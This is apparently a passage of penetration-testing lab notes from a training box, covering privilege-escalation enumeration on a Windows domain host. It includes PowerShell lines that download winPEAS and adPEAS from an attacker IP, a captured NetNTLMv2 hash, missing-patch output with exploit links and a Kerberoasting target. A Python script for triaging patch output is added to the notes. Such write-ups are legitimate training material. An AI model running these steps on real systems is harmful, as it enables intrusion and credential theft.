PEAS


Running automated enumeration after the manual enumeration was completed

PS C:\tmp> iwr -Uri http://192.168.45.171/winPEASany.exe -OutFile .\winPEASany.exe

Delivery complete

Executing PEAS

ENV


╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables 
    COMPUTERNAME: SERVER
    USERPROFILE: C:\Users\svc_apache
    PUBLIC: C:\Users\Public
    LOCALAPPDATA: C:\Users\svc_apache\AppData\Local
    PSModulePath: C:\Users\svc_apache\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    PROCESSOR_ARCHITECTURE: AMD64
    Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\svc_apache\AppData\Local\Microsoft\WindowsApps
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    ProgramFiles(x86): C:\Program Files (x86)
    PROCESSOR_LEVEL: 25
    ProgramFiles: C:\Program Files
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
    PSExecutionPolicyPreference: Restricted
    SystemRoot: C:\Windows
    ALLUSERSPROFILE: C:\ProgramData
    DriverData: C:\Windows\System32\Drivers\DriverData
    AP_PARENT_PID: 3316
    ProgramData: C:\ProgramData
    PROCESSOR_REVISION: 0101
    USERNAME: svc_apache
    CommonProgramW6432: C:\Program Files\Common Files
    CommonProgramFiles: C:\Program Files\Common Files
    OS: Windows_NT
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    ComSpec: C:\Windows\system32\cmd.exe
    PROMPT: $P$G
    SystemDrive: C:
    TEMP: C:\Users\SVC_AP~1\AppData\Local\Temp
    NUMBER_OF_PROCESSORS: 2
    APPDATA: C:\Users\svc_apache\AppData\Roaming
    TMP: C:\Users\SVC_AP~1\AppData\Local\Temp
    ProgramW6432: C:\Program Files
    windir: C:\Windows
    USERDOMAIN: ACCESS
    USERDNSDOMAIN: ACCESS.OFFSEC
 
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables 
    ComSpec: C:\Windows\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    OS: Windows_NT
    Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
Shell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\Windows\TEMP
    TMP: C:\Windows\TEMP
    USERNAME: SYSTEM
    windir: C:\Windows
    NUMBER_OF_PROCESSORS: 2
    PROCESSOR_LEVEL: 25
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    PROCESSOR_REVISION: 0101

N/A


UAC


PowerShell


NTLM


svc_apache::ACCESS:1122334455667788:2d106f02f59b276dfbba09c6a7d993e4:0101000000000000a08a22b5d0b2db0167955f9da51d8ef7000000000800300030000000000000000000000000300000fcec954aca360e8a28f587ab81f3f71342e784446bf2766b3d1e9cc83709ce6a0a0010000000000000000000000000000000000009000000000000000000

.NET


Token Privileges (svc_apache)


Enumerated

AutoLogon


PS C:\tmp> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    DefaultDomainName    REG_SZ    ACCESS
    DefaultUserName    REG_SZ    
    DisableBackButton    REG_DWORD    0x1
    EnableSIHostIntegration    REG_DWORD    0x1
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ    
    LegalNoticeText    REG_SZ    
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    ShellCritical    REG_DWORD    0x0
    ShellInfrastructure    REG_SZ    sihost.exe
    SiHostCritical    REG_DWORD    0x0
    SiHostReadyTimeOut    REG_DWORD    0x0
    SiHostRestartCountLimit    REG_DWORD    0x0
    SiHostRestartTimeGap    REG_DWORD    0x0
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    WinStationsDisabled    REG_SZ    0
    scremoveoption    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    LastLogOffEndTimePerfCounter    REG_QWORD    0xa3248381
    ShutdownFlags    REG_DWORD    0x8000022b
    DisableLockWorkstation    REG_DWORD    0x0
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey

Processes/Services


Modifiable Service


SMB


Kerberos


Interesting Files / Directory


Write access to the C:\xampp directory

WESNG


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access]
└─$ wes --update ; wes sysinfo --exploits-only --hide "Internet Explorer" Edge Flash 
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Updating definitions
[+] Obtained definitions created at 20250418
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
    - Name: Windows Server 2019
    - Generation: 2019
    - Build: 17763
    - Version: 1809
    - Architecture: x64-based
    - Installed hotfixes (13): KB5009472, KB4512577, KB4535680, KB4577586, KB4589208, KB5003243, KB5003711, KB5005112, KB5011551, KB5006754, KB5009642, KB5011574, KB5005701
[+] Loading definitions
    - Creation date of definitions: 20250418
[+] Determining missing patches
[+] Filtering duplicate vulnerabilities
[+] Applying display filters
[!] Found vulnerabilities!
 
Date: 20231114
CVE: CVE-2023-38039
KB: KB
Title: Hackerone: CVE-2023-38039 HTTP headers eat all memory
Affected product: Windows Server 2019
Affected component: Windows cURL Implementation
Severity: Low
Impact: Denial of Service
Exploits: https://hackerone.com/reports/2072338, https://hackerone.com/reports/2072338
 
Date: 20250415
CVE: CVE-2023-44487
KB: KB
Title: MITRE: CVE-2023-44487 HTTP/2 Rapid Reset Attack
Affected product: Windows Server 2019
Affected component: HTTP/2
Severity: Important
Impact: Denial of Service
Exploits: https://github.com/micrictor/http2-rst-stream, https://github.com/micrictor/http2-rst-stream, https://security.netapp.com/advisory/ntap-20240621-0006/, https://security.netapp.com/advisory/ntap-20240621-0006/
 
Date: 20200512
CVE: CVE-2020-0646
KB: KB4535101
Title: .NET Framework Remote Code Execution Injection Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html, http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
 
Date: 20200512
CVE: CVE-2020-0646
KB: KB4535101
Title: .NET Framework Remote Code Execution Injection Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html, http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
 
Date: 20200512
CVE: CVE-2020-0646
KB: KB4535101
Title: .NET Framework Remote Code Execution Injection Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html, http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
 
Date: 20200512
CVE: CVE-2020-0646
KB: KB4535101
Title: .NET Framework Remote Code Execution Injection Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html, http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
 
Date: 20200714
CVE: CVE-2020-1147
KB: KB4578966
Title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
 
Date: 20200714
CVE: CVE-2020-1147
KB: KB4578966
Title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
 
Date: 20200714
CVE: CVE-2020-1147
KB: KB4578966
Title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
 
Date: 20200714
CVE: CVE-2020-1147
KB: KB4578966
Title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
 
[-] Missing patches: 3
    - KB4535101: patches 4 vulnerabilities
    - KB4578966: patches 4 vulnerabilities
    - KB: patches 2 vulnerabilities
[I] KB with the most recent release date
    - ID: KB
    - Release date: 20250415
[+] Done. Displaying 10 of the 1598 vulnerabilities found.
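The wes run above prints one record per (CVE, affected product) pair and repeats the same exploit reference inside each record, so a run that found 1598 vulnerabilities is hard to triage by eye. The script below is an added example, not part of these notes or of wesng: it parses wes's plain-text output (key/value records separated by blank lines), merges the per-product duplicates into one entry per CVE, de-duplicates the exploit references, and orders the missing KBs by the worst severity they close, which is the order a patch owner wants. SAMPLE is a constructed excerpt assembled from the records shown above; to triage a real run, save wes's standard output to a file and pass its contents to summarize(). Names such as parse_records, group_by_cve and rank_missing_kbs are this example's own, not wesng's.

```python
"""Triage helper for Windows Exploit Suggester (wesng) text output.

Added example; not part of the lab notes or of wesng itself.
"""
import re
from collections import defaultdict

# Constructed sample in the key/value layout wes prints (values copied from the
# run above). A blank line terminates each record.
SAMPLE = """\
Date: 20200512
CVE: CVE-2020-0646
KB: KB4535101
Title: .NET Framework Remote Code Execution Injection Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html, http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html

Date: 20200512
CVE: CVE-2020-0646
KB: KB4535101
Title: .NET Framework Remote Code Execution Injection Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html

Date: 20250415
CVE: CVE-2023-44487
KB: KB
Title: MITRE: CVE-2023-44487 HTTP/2 Rapid Reset Attack
Affected product: Windows Server 2019
Affected component: HTTP/2
Severity: Important
Impact: Denial of Service
Exploits: https://github.com/micrictor/http2-rst-stream, https://github.com/micrictor/http2-rst-stream
"""

SEVERITY_RANK = {"Critical": 4, "Important": 3, "Moderate": 2, "Low": 1}


def parse_records(text):
    """Split wes output into one dict per blank-line-separated record.

    Only the first ':' on a line separates key from value, so titles such as
    'MITRE: CVE-2023-44487 ...' and URL lists survive intact. Chunks without a
    CVE key (the banner, the missing-patches summary) are dropped."""
    records = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in chunk.splitlines():
            key, sep, value = line.partition(":")
            if sep and key.strip():
                rec[key.strip()] = value.strip()
        if "CVE" in rec:
            records.append(rec)
    return records


def group_by_cve(records):
    """Merge the per-product duplicates into a single entry per CVE."""
    grouped = {}
    for rec in records:
        entry = grouped.setdefault(rec["CVE"], {
            "title": rec.get("Title", ""),
            "severity": rec.get("Severity", "Unknown"),
            "impact": rec.get("Impact", ""),
            "kb": rec.get("KB", ""),
            "products": set(),
            "exploits": set(),   # set() removes the repeated references
        })
        entry["products"].add(rec.get("Affected product", ""))
        for url in rec.get("Exploits", "").split(","):
            if url.strip():
                entry["exploits"].add(url.strip())
    return grouped


def rank_missing_kbs(grouped):
    """Return (kb, [cves]) pairs, worst severity first.

    wes prints a bare 'KB' when no Microsoft KB exists for the finding
    (advisory-only entries); label those so they are not read as a patch."""
    by_kb = defaultdict(list)
    for cve, entry in grouped.items():
        kb = entry["kb"] if entry["kb"] != "KB" else "(no KB / advisory only)"
        by_kb[kb].append(cve)

    def worst(kb):
        return max(SEVERITY_RANK.get(grouped[c]["severity"], 0) for c in by_kb[kb])

    return sorted(by_kb.items(), key=lambda kv: worst(kv[0]), reverse=True)


def summarize(text):
    """One line per missing KB, plus a distinct-CVE count, as a string."""
    grouped = group_by_cve(parse_records(text))
    lines = [f"{len(grouped)} distinct CVEs from the wes output"]
    for kb, cves in rank_missing_kbs(grouped):
        sev = max((grouped[c]["severity"] for c in cves),
                  key=lambda s: SEVERITY_RANK.get(s, 0))
        lines.append(f"{kb}: {len(cves)} CVE(s), worst severity {sev}: "
                     f"{', '.join(sorted(cves))}")
    return "\n".join(lines)


if __name__ == "__main__":
    for cve, e in group_by_cve(parse_records(SAMPLE)).items():
        print(f"{cve} [{e['severity']}] {e['impact']} -> {e['kb']}; "
              f"{len(e['products'])} product(s), {len(e['exploits'])} unique exploit ref(s)")
    print(summarize(SAMPLE))
```

Grouping by CVE rather than by record is what collapses the four .NET lines above into one, and ranking by the KB rather than by the CVE gives the list that actually gets acted on: install KB4535101 and KB4578966, then decide separately what to do about the advisory-only HTTP/2 and cURL findings that no KB closes.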

adPEAS


PS C:\tmp> iwr -Uri http://192.168.45.171/adPEAS.ps1 -OutFile .\adPEAS.ps1

Delivery complete

Executing adPEAS

Domain


Add-Computer


Kerberoasting


svc_mssql

SharpHound